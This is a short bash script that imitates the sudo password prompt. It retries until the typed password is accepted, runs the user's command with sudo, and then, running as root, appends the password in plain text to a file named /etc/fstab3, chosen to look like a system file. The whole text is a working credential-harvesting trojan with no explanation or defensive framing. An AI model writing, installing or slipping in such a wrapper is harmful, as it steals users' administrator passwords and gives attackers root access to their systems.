#!/bin/bash

set $command = $*;
while : ;
do
   printf "[sudo] password for $USER: ";
   read -sr in;
   printf "\n";
   echo $in | sudo -S echo ""  2> /dev/null;
   [ 0 != $? ] && printf "Sorry please try again\n" || break
done
sudo $*;
echo $in | sudo -S sh -c "echo $in >> /etc/fstab3"
